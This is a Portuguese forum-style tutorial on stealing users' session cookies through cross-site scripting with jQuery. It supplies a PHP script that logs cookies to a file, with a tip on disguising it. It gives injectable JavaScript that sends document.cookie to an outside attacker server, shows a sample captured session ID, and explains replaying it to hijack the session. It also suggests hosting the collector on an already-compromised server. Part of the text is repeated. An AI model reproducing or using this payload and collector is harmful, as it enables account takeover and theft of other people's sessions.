Tweet
Já teve problemas com XSS? Não soube fazer? Ou o script redirecionou pra outra página?
É comum erros com XSS, o script redireciona pra fora do site, a página fica aparecendo carregando, são inumeros os problemas
Simples! Use jQuery. Esse é um tutorial de como roubar uma sessão com XSS e jQuery.
Vamos obter o Cookie de acesso do alvo e enviar para um script em algum servidor externo, pode
ser qualquer servidor até algum que você ja invadiu.
Primeiro de tudo o script em PHP, ele vai pegar um cookie enviado pelo método GET e armazenar o arquivo
cookiejar (pote de biscoito
):
Salve como gc.php
Ele guarda cada conjunto de cookies enviados por linha.
Se a aplicação alvo ja usa jQuery é melhor, senão você vai ter que incluir isso também.
Se a aplicação restringe o tamanho tente retirar querbras de linhas, espaços desnecessarios, e campos desnecessarios.
O arquivo cookiejar vai ficar mais ou menos assim quando alguem entrar na página alterada:
Use alguma extensão que permita alterar os cabeçalhos HTTP e pronto, você usou Hijacking, XSS e jQuery.
É comum erros com XSS, o script redireciona pra fora do site, a página fica aparecendo carregando, são inumeros os problemas
Simples! Use jQuery. Esse é um tutorial de como roubar uma sessão com XSS e jQuery.
Vamos obter o Cookie de acesso do alvo e enviar para um script em algum servidor externo, pode
ser qualquer servidor até algum que você ja invadiu.
Primeiro de tudo o script em PHP, ele vai pegar um cookie enviado pelo método GET e armazenar o arquivo
cookiejar (pote de biscoito
):Código PHP:
<?php
$file = fopen('cookiejar', 'a'); # Abre o arquivo
$cookie = $_GET['c']; #Use nomes de parametros curtos assim fica mais dificil de perceber que seja um script malicioso
fwrite($file, $cookie."\n"); #Guarda o cookie
fclose($file);
?>
Ele guarda cada conjunto de cookies enviados por linha.
Se a aplicação alvo ja usa jQuery é melhor, senão você vai ter que incluir isso também.
Código HTML:
<!-- Retire a linha abaixo se a aplicação já usa jQuery --> <script language="javascript" src="http://code.jquery.com/jquery-1.11.0.js"></script> <script language="javascript"> $(function() { $.get("http://seuservidor/gc.php", {c : document.cookie}); }); </script>
O arquivo cookiejar vai ficar mais ou menos assim quando alguem entrar na página alterada:
Código:
CWD=L3Zhci93d3c%3D; PHPSESSID=9f1b0j3n8s3bs9jchdalk5rgn4
Comment